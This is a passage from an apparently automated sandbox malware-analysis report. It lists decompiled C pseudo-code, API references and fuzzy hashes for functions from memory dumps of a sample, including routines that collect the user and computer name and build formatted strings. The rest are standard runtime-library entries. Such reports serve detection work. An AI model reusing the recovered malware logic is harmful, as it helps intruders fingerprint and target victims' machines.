                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.679476534.00000000031A1000.00000020.00020000.sdmp, Offset: 031A0000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.679386705.00000000031A0000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679603078.00000000031AC000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679651403.00000000031AD000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679884130.00000000031AF000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemset
                                                                                                                                  • String ID: Ut$@MtNt
                                                                                                                                  • API String ID: 3075724336-969920318
                                                                                                                                  • Opcode ID: 57fff6457dc1dad9e5a8d0215e1f7bdcf7289910f02933ee20caff28039219f7
                                                                                                                                  • Instruction ID: 51d6797d9cf5e4e7d92e5da7fe5c29d4986906af20f3fb6dc58feba7a84f2429
                                                                                                                                  • Opcode Fuzzy Hash: 57fff6457dc1dad9e5a8d0215e1f7bdcf7289910f02933ee20caff28039219f7
                                                                                                                                  • Instruction Fuzzy Hash: 94313FBA900A08BFDB11EFE8DD88D9EBBB8EF0C346F144469E545E7110D770A945DB60
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 031A5F64, Relevance: 13.6, APIs: 9, Instructions: 112stringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 27%
                                                                                                                                  			E031A5F64(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				long _v16;
				intOrPtr _v20;
				signed int _v24;
				void* __esi;
				long _t43;
				intOrPtr _t44;
				intOrPtr _t46;
				void* _t48;
				void* _t49;
				void* _t50;
				intOrPtr _t54;
				intOrPtr _t57;
				void* _t58;
				void* _t59;
				void* _t60;
				intOrPtr _t66;
				void* _t71;
				void* _t74;
				intOrPtr _t75;
				void* _t77;
				intOrPtr _t79;
				intOrPtr* _t80;
				intOrPtr _t91;

				_t79 =  *0x31ad37c; // 0x5bd9818
				_v24 = 8;
				_t43 = GetTickCount();
				_push(5);
				_t74 = 0xa;
				_v16 = _t43;
				_t44 = E031A3A69(_t74,  &_v16);
				_v8 = _t44;
				if(_t44 == 0) {
					_v8 = 0x31ac1ac;
				}
				_t46 = E031A51DA(_t79);
				_v12 = _t46;
				if(_t46 != 0) {
					_t80 = __imp__;
					_t48 =  *_t80(_v8, _t71);
					_t49 =  *_t80(_v12);
					_t50 =  *_t80(_a4);
					_t54 = E031A75F6(lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + 0x102);
					_v20 = _t54;
					if(_t54 != 0) {
						_t75 =  *0x31ad2e0; // 0x2a2a5a8
						_t16 = _t75 + 0x31aeb10; // 0x530025
						 *0x31ad118(_t54, _t16, _v8, _v8, _a4, _v12, _a8);
						_push(4);
						_t77 = 5;
						_t57 = E031A3A69(_t77,  &_v16);
						_v8 = _t57;
						if(_t57 == 0) {
							_v8 = 0x31ac1b0;
						}
						_t58 =  *_t80(_v8);
						_t59 =  *_t80(_v12);
						_t60 =  *_t80(_a4);
						_t91 = E031A75F6(lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + 0x13a);
						if(_t91 == 0) {
							E031A4AAB(_v20);
						} else {
							_t66 =  *0x31ad2e0; // 0x2a2a5a8
							_t31 = _t66 + 0x31aec30; // 0x73006d
							 *0x31ad118(_t91, _t31, _v8, _v8, _a4, _v12, _a12);
							 *_a16 = _v20;
							_v24 = _v24 & 0x00000000;
							 *_a20 = _t91;
						}
					}
					E031A4AAB(_v12);
				}
				return _v24;
			}




























                                                                                                                                  0x031a5f6c
                                                                                                                                  0x031a5f72
                                                                                                                                  0x031a5f79
                                                                                                                                  0x031a5f7f
                                                                                                                                  0x031a5f83
                                                                                                                                  0x031a5f87
                                                                                                                                  0x031a5f8a
                                                                                                                                  0x031a5f8f
                                                                                                                                  0x031a5f94
                                                                                                                                  0x031a5f96
                                                                                                                                  0x031a5f96
                                                                                                                                  0x031a5f9f
                                                                                                                                  0x031a5fa4
                                                                                                                                  0x031a5fa9
                                                                                                                                  0x031a5faf
                                                                                                                                  0x031a5fb9
                                                                                                                                  0x031a5fc2
                                                                                                                                  0x031a5fc9
                                                                                                                                  0x031a5fe2
                                                                                                                                  0x031a5fe7
                                                                                                                                  0x031a5fec
                                                                                                                                  0x031a5ff5
                                                                                                                                  0x031a5ffe
                                                                                                                                  0x031a600f
                                                                                                                                  0x031a6018
                                                                                                                                  0x031a601c
                                                                                                                                  0x031a6020
                                                                                                                                  0x031a6025
                                                                                                                                  0x031a602a
                                                                                                                                  0x031a602c
                                                                                                                                  0x031a602c
                                                                                                                                  0x031a6036
                                                                                                                                  0x031a603f
                                                                                                                                  0x031a6046
                                                                                                                                  0x031a605e
                                                                                                                                  0x031a6062
                                                                                                                                  0x031a609f
                                                                                                                                  0x031a6064
                                                                                                                                  0x031a6067
                                                                                                                                  0x031a606f
                                                                                                                                  0x031a6080
                                                                                                                                  0x031a608c
                                                                                                                                  0x031a6094
                                                                                                                                  0x031a6098
                                                                                                                                  0x031a6098
                                                                                                                                  0x031a6062
                                                                                                                                  0x031a60a7
                                                                                                                                  0x031a60ac
                                                                                                                                  0x031a60b3

                                                                                                                                  APIs
                                                                                                                                  • GetTickCount.KERNEL32 ref: 031A5F79
                                                                                                                                  • lstrlen.KERNEL32(?,80000002,00000005), ref: 031A5FB9
                                                                                                                                  • lstrlen.KERNEL32(00000000), ref: 031A5FC2
                                                                                                                                  • lstrlen.KERNEL32(00000000), ref: 031A5FC9
                                                                                                                                  • lstrlenW.KERNEL32(80000002), ref: 031A5FD6
                                                                                                                                  • lstrlen.KERNEL32(?,00000004), ref: 031A6036
                                                                                                                                  • lstrlen.KERNEL32(?), ref: 031A603F
                                                                                                                                  • lstrlen.KERNEL32(?), ref: 031A6046
                                                                                                                                  • lstrlenW.KERNEL32(?), ref: 031A604D
                                                                                                                                    • Part of subcall function 031A4AAB: RtlFreeHeap.NTDLL(00000000,00000000,031A5012,00000000,?,?,00000000), ref: 031A4AB7
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.679476534.00000000031A1000.00000020.00020000.sdmp, Offset: 031A0000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.679386705.00000000031A0000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679603078.00000000031AC000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679651403.00000000031AD000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679884130.00000000031AF000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrlen$CountFreeHeapTick
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2535036572-0
                                                                                                                                  • Opcode ID: a3fd87f3024e99f6aaa3c41f99a65fd62a488d983899e97803deabaf2a5076d3
                                                                                                                                  • Instruction ID: b62314a71445ce8fd20552a7d635a67e0940db1ebf08640f14c732c966d17055
                                                                                                                                  • Opcode Fuzzy Hash: a3fd87f3024e99f6aaa3c41f99a65fd62a488d983899e97803deabaf2a5076d3
                                                                                                                                  • Instruction Fuzzy Hash: A441797A900A19FFCF11EFA8DD0899EBBB5EF48345F094055E900AB211DB35DB51EBA0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E932FB2, Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 285COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 6E92F299: GetLastError.KERNEL32(00000000,00000000,?,6E927CF9,?,?,00000003,?,6E8F1083,6E8F10F4,?,6E8F0EE0,00000000,00000000,00000000,00000004), ref: 6E92F29E
                                                                                                                                    • Part of subcall function 6E92F299: SetLastError.KERNEL32(00000000,6E97A1A0,000000FF,?,6E927CF9,?,?,00000003,?,6E8F1083,6E8F10F4,?,6E8F0EE0,00000000,00000000,00000000), ref: 6E92F33C
                                                                                                                                  • _free.LIBCMT ref: 6E9332BF
                                                                                                                                  • _free.LIBCMT ref: 6E9332D8
                                                                                                                                  • _free.LIBCMT ref: 6E933316
                                                                                                                                  • _free.LIBCMT ref: 6E93331F
                                                                                                                                  • _free.LIBCMT ref: 6E93332B
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free$ErrorLast
                                                                                                                                  • String ID: C
                                                                                                                                  • API String ID: 3291180501-1037565863
                                                                                                                                  • Opcode ID: d594f339bbfa94ae45436fc395ad65c7652d6c7369d1eed73915f87715df27c7
                                                                                                                                  • Instruction ID: ed8a075b3687f1ef9bae86a4afd6dfa99254e542ee22670e7f213bffc20a41de
                                                                                                                                  • Opcode Fuzzy Hash: d594f339bbfa94ae45436fc395ad65c7652d6c7369d1eed73915f87715df27c7
                                                                                                                                  • Instruction Fuzzy Hash: 51C16F7594122ADFDB24CF68C898A9DB3B8FF49304F6045AAD819A7354D731EE90CF40
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 031A137A, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 83COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E031A137A() {
				long _v8;
				long _v12;
				int _v16;
				long _t39;
				long _t43;
				signed int _t47;
				short _t51;
				signed int _t52;
				int _t56;
				int _t57;
				char* _t64;
				short* _t67;

				_v16 = 0;
				_v8 = 0;
				GetUserNameW(0,  &_v8);
				_t39 = _v8;
				if(_t39 != 0) {
					_v12 = _t39;
					_v8 = 0;
					GetComputerNameW(0,  &_v8);
					_t43 = _v8;
					if(_t43 != 0) {
						_v12 = _v12 + _t43 + 2;
						_t64 = E031A75F6(_v12 + _t43 + 2 << 2);
						if(_t64 != 0) {
							_t47 = _v12;
							_t67 = _t64 + _t47 * 2;
							_v8 = _t47;
							if(GetUserNameW(_t67,  &_v8) == 0) {
								L7:
								E031A4AAB(_t64);
							} else {
								_t51 = 0x40;
								 *((short*)(_t67 + _v8 * 2 - 2)) = _t51;
								_t52 = _v8;
								_v12 = _v12 - _t52;
								if(GetComputerNameW( &(_t67[_t52]),  &_v12) == 0) {
									goto L7;
								} else {
									_t56 = _v12 + _v8;
									_t31 = _t56 + 2; // 0x31a4565
									_v12 = _t56;
									_t57 = WideCharToMultiByte(0xfde9, 0, _t67, _t56, _t64, _t56 + _t31, 0, 0);
									_v8 = _t57;
									if(_t57 == 0) {
										goto L7;
									} else {
										_t64[_t57] = 0;
										_v16 = _t64;
									}
								}
							}
						}
					}
				}
				return _v16;
			}















                                                                                                                                  0x031a1388
                                                                                                                                  0x031a138b
                                                                                                                                  0x031a138e
                                                                                                                                  0x031a1394
                                                                                                                                  0x031a1399
                                                                                                                                  0x031a139f
                                                                                                                                  0x031a13a7
                                                                                                                                  0x031a13aa
                                                                                                                                  0x031a13b0
                                                                                                                                  0x031a13b5
                                                                                                                                  0x031a13c2
                                                                                                                                  0x031a13cf
                                                                                                                                  0x031a13d3
                                                                                                                                  0x031a13d5
                                                                                                                                  0x031a13d9
                                                                                                                                  0x031a13dc
                                                                                                                                  0x031a13ec
                                                                                                                                  0x031a143f
                                                                                                                                  0x031a1440
                                                                                                                                  0x031a13ee
                                                                                                                                  0x031a13f3
                                                                                                                                  0x031a13f4
                                                                                                                                  0x031a13f9
                                                                                                                                  0x031a13fc
                                                                                                                                  0x031a140f
                                                                                                                                  0x00000000
                                                                                                                                  0x031a1411
                                                                                                                                  0x031a1414
                                                                                                                                  0x031a1419
                                                                                                                                  0x031a1427
                                                                                                                                  0x031a142a
                                                                                                                                  0x031a1430
                                                                                                                                  0x031a1435
                                                                                                                                  0x00000000
                                                                                                                                  0x031a1437
                                                                                                                                  0x031a1437
                                                                                                                                  0x031a143a
                                                                                                                                  0x031a143a
                                                                                                                                  0x031a1435
                                                                                                                                  0x031a140f
                                                                                                                                  0x031a1445
                                                                                                                                  0x031a1446
                                                                                                                                  0x031a13b5
                                                                                                                                  0x031a144c

                                                                                                                                  APIs
                                                                                                                                  • GetUserNameW.ADVAPI32(00000000,031A4563), ref: 031A138E
                                                                                                                                  • GetComputerNameW.KERNEL32(00000000,031A4563), ref: 031A13AA
                                                                                                                                    • Part of subcall function 031A75F6: RtlAllocateHeap.NTDLL(00000000,00000000,031A4F70), ref: 031A7602
                                                                                                                                  • GetUserNameW.ADVAPI32(00000000,031A4563), ref: 031A13E4
                                                                                                                                  • GetComputerNameW.KERNEL32(031A4563,?), ref: 031A1407
                                                                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,031A4563,00000000,031A4565,00000000,00000000,?,?,031A4563), ref: 031A142A
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.679476534.00000000031A1000.00000020.00020000.sdmp, Offset: 031A0000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.679386705.00000000031A0000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679603078.00000000031AC000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679651403.00000000031AD000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679884130.00000000031AF000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                                                                                                                                  • String ID: @ht
                                                                                                                                  • API String ID: 3850880919-1371871952
                                                                                                                                  • Opcode ID: b0752261b834d158fcb108265dafdf13c7deed4a327e615606986c640a0f86e5
                                                                                                                                  • Instruction ID: 285dd0b3632e960bfb1d8bc73f5a345760297e8e0d47946c076f60585aacf388
                                                                                                                                  • Opcode Fuzzy Hash: b0752261b834d158fcb108265dafdf13c7deed4a327e615606986c640a0f86e5
                                                                                                                                  • Instruction Fuzzy Hash: 0A21D77A900608FFDB11DFE9D984DEEBBB9EF48201F5444AAE501E7201EB309B45DB61
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 031A1974, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68stringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 63%
                                                                                                                                  			E031A1974(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _t9;
				intOrPtr _t13;
				char* _t28;
				void* _t33;
				void* _t34;
				char* _t36;
				intOrPtr* _t40;
				char* _t41;
				char* _t42;
				char* _t43;

				_t34 = __edx;
				_push(__ecx);
				_t9 =  *0x31ad2e0; // 0x2a2a5a8
				_t1 = _t9 + 0x31ae62c; // 0x253d7325
				_t36 = 0;
				_t28 = E031A43A8(__ecx, _t1);
				if(_t28 != 0) {
					_t40 = __imp__;
					_t13 =  *_t40(_t28);
					_v8 = _t13;
					_t41 = E031A75F6(_v8 +  *_t40(_a4) + 1);
					if(_t41 != 0) {
						strcpy(_t41, _t28);
						_pop(_t33);
						__imp__(_t41, _a4);
						_t36 = E031A5601(_t34, _t41, _a8);
						E031A4AAB(_t41);
						_t42 = E031A756E(StrTrimA(_t36, "="), _t36);
						if(_t42 != 0) {
							E031A4AAB(_t36);
							_t36 = _t42;
						}
						_t43 = E031A26DD(_t36, _t33);
						if(_t43 != 0) {
							E031A4AAB(_t36);
							_t36 = _t43;
						}
					}
					E031A4AAB(_t28);
				}
				return _t36;
			}














                                                                                                                                  0x031a1974
                                                                                                                                  0x031a1977
                                                                                                                                  0x031a1978
                                                                                                                                  0x031a1980
                                                                                                                                  0x031a1987
                                                                                                                                  0x031a198e
                                                                                                                                  0x031a1992
                                                                                                                                  0x031a1998
                                                                                                                                  0x031a199f
                                                                                                                                  0x031a19a4
                                                                                                                                  0x031a19b6
                                                                                                                                  0x031a19ba
                                                                                                                                  0x031a19be
                                                                                                                                  0x031a19c4
                                                                                                                                  0x031a19c9
                                                                                                                                  0x031a19d9
                                                                                                                                  0x031a19db
                                                                                                                                  0x031a19f2
                                                                                                                                  0x031a19f6
                                                                                                                                  0x031a19f9
                                                                                                                                  0x031a19fe
                                                                                                                                  0x031a19fe
                                                                                                                                  0x031a1a07
                                                                                                                                  0x031a1a0b
                                                                                                                                  0x031a1a0e
                                                                                                                                  0x031a1a13
                                                                                                                                  0x031a1a13
                                                                                                                                  0x031a1a0b
                                                                                                                                  0x031a1a16
                                                                                                                                  0x031a1a16
                                                                                                                                  0x031a1a21

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 031A43A8: lstrlen.KERNEL32(00000000,00000000,00000000,7691C740,?,?,?,031A198E,253D7325,00000000,00000000,7691C740,?,?,031A4653,?), ref: 031A440F
                                                                                                                                    • Part of subcall function 031A43A8: sprintf.NTDLL ref: 031A4430
                                                                                                                                  • lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,7691C740,?,?,031A4653,?,05BD95B0), ref: 031A199F
                                                                                                                                  • lstrlen.KERNEL32(?,?,?,031A4653,?,05BD95B0), ref: 031A19A7
                                                                                                                                    • Part of subcall function 031A75F6: RtlAllocateHeap.NTDLL(00000000,00000000,031A4F70), ref: 031A7602
                                                                                                                                  • strcpy.NTDLL ref: 031A19BE
                                                                                                                                  • lstrcat.KERNEL32(00000000,?), ref: 031A19C9
                                                                                                                                    • Part of subcall function 031A5601: lstrlen.KERNEL32(?,?,?,?,00000001,00000000,00000000,?,031A19D8,00000000,?,?,?,031A4653,?,05BD95B0), ref: 031A5618
                                                                                                                                    • Part of subcall function 031A4AAB: RtlFreeHeap.NTDLL(00000000,00000000,031A5012,00000000,?,?,00000000), ref: 031A4AB7
                                                                                                                                  • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,031A4653,?,05BD95B0), ref: 031A19E6
                                                                                                                                    • Part of subcall function 031A756E: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,031A19F2,00000000,?,?,031A4653,?,05BD95B0), ref: 031A7578
                                                                                                                                    • Part of subcall function 031A756E: _snprintf.NTDLL ref: 031A75D6
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.679476534.00000000031A1000.00000020.00020000.sdmp, Offset: 031A0000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.679386705.00000000031A0000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679603078.00000000031AC000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679651403.00000000031AD000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679884130.00000000031AF000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                                                                                                                                  • String ID: =
                                                                                                                                  • API String ID: 2864389247-1428090586
                                                                                                                                  • Opcode ID: e88ec1ff7b75e81dbb74a022b4c2971360f86d3a47ded964989443cf00d02bfa
                                                                                                                                  • Instruction ID: 7e7bbad9d4454e18b00ba11d7ebf7ef1290d490ed6e612435535876656a7baf1
                                                                                                                                  • Opcode Fuzzy Hash: e88ec1ff7b75e81dbb74a022b4c2971360f86d3a47ded964989443cf00d02bfa
                                                                                                                                  • Instruction Fuzzy Hash: EF11A33F901F247B8612FBAD9C84C6F67AD9E8D6A37094025F605EF200DF74C90257A4
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E905681, Relevance: 10.6, APIs: 7, Instructions: 66COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E905688
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E905692
                                                                                                                                  • int.LIBCPMT ref: 6E9056A9
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E9056E3
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E905703
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E905710
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E90571D
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3920336645-0
                                                                                                                                  • Opcode ID: 47fbccbaf4d3c66af652bee8934bc126aca6ac8b1d239c66fc3682141d645f9f
                                                                                                                                  • Instruction ID: 70cb1188cd3bd5326050782a795dcf9589d5bb0d0713073cc7b52933c554cb35
                                                                                                                                  • Opcode Fuzzy Hash: 47fbccbaf4d3c66af652bee8934bc126aca6ac8b1d239c66fc3682141d645f9f
                                                                                                                                  • Instruction Fuzzy Hash: 9921BE71900619DBCF12CFE8C9446EEBBB9AF94758F504D0DE8506B280CBB0D946CF81
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8F7D9F, Relevance: 10.6, APIs: 7, Instructions: 66COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F7DA6
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F7DB0
                                                                                                                                  • int.LIBCPMT ref: 6E8F7DC7
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F7E01
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F7E21
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F7E2E
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F7E3B
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3920336645-0
                                                                                                                                  • Opcode ID: 8a0dba55f821380c3583f06942485365aa4d17700697163c691d3ebb1b63ee7a
                                                                                                                                  • Instruction ID: 62cd371ed5acbed92dd8687ec074053403f710fd931aeef3bd0212afc5d21419
                                                                                                                                  • Opcode Fuzzy Hash: 8a0dba55f821380c3583f06942485365aa4d17700697163c691d3ebb1b63ee7a
                                                                                                                                  • Instruction Fuzzy Hash: 8F21C37190061ADBCF02DFE8C9556EE7BB9AF45798F104D0EE8506B280DBB4DE06CB91
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E93D4AB, Relevance: 10.6, APIs: 7, Instructions: 65COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 6E93D196: _free.LIBCMT ref: 6E93D1BB
                                                                                                                                  • _free.LIBCMT ref: 6E93D4F9
                                                                                                                                    • Part of subcall function 6E931434: HeapFree.KERNEL32(00000000,00000000,?,6E93D1C0,?,00000000,?,?,?,6E93D4C4,?,00000007,?,?,6E93B43B,?), ref: 6E93144A
                                                                                                                                    • Part of subcall function 6E931434: GetLastError.KERNEL32(?,?,6E93D1C0,?,00000000,?,?,?,6E93D4C4,?,00000007,?,?,6E93B43B,?,?), ref: 6E93145C
                                                                                                                                  • _free.LIBCMT ref: 6E93D504
                                                                                                                                  • _free.LIBCMT ref: 6E93D50F
                                                                                                                                  • _free.LIBCMT ref: 6E93D563
                                                                                                                                  • _free.LIBCMT ref: 6E93D56E
                                                                                                                                  • _free.LIBCMT ref: 6E93D579
                                                                                                                                  • _free.LIBCMT ref: 6E93D584
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                  • Opcode ID: 39b13820a97e8b63a2bd5758ecc74a4ff61c4819cdfe69e10f1538665c390981
                                                                                                                                  • Instruction ID: 1d6ea0232c3b17981f01e70afe98d97150181f461490c57587651ce70f166d46
                                                                                                                                  • Opcode Fuzzy Hash: 39b13820a97e8b63a2bd5758ecc74a4ff61c4819cdfe69e10f1538665c390981
                                                                                                                                  • Instruction Fuzzy Hash: 99118131951B24ABE520ABF0CC09FCB77AE5FA1708F904D14E29966262DB34F5188EA0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8F1C96, Relevance: 10.6, APIs: 7, Instructions: 53COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F1C9D
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F1CA7
                                                                                                                                  • int.LIBCPMT ref: 6E8F1CBE
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • numpunct.LIBCPMT ref: 6E8F1CE1
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F1CF8
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F1D18
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F1D25
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registernumpunct
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3064348918-0
                                                                                                                                  • Opcode ID: 12d335e6f6f7b156dff9692d7761dc7e5c65f9840653dd94bc3b02f4a9dd28ed
                                                                                                                                  • Instruction ID: 25b3e64841940af01c0726f8d2e04ccf7593446a050bdbc4f0793be7161eef49
                                                                                                                                  • Opcode Fuzzy Hash: 12d335e6f6f7b156dff9692d7761dc7e5c65f9840653dd94bc3b02f4a9dd28ed
                                                                                                                                  • Instruction Fuzzy Hash: 6A11A071900619CBCB01DBE8C9547EDBBB9AF85398F244D08D4106B291DF78994B8B91
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8F76A3, Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F76AA
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F76B4
                                                                                                                                  • int.LIBCPMT ref: 6E8F76CB
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • moneypunct.LIBCPMT ref: 6E8F76EE
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F7705
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F7725
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F7732
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3376033448-0
                                                                                                                                  • Opcode ID: bc1c7e844a45d9e42bbf48954f26c998c10ef990978bc47933128bb72f022cc7
                                                                                                                                  • Instruction ID: afc37bdf51097a3f4d9e8732628360971be9f2a493777e728531e9b3d8e27067
                                                                                                                                  • Opcode Fuzzy Hash: bc1c7e844a45d9e42bbf48954f26c998c10ef990978bc47933128bb72f022cc7
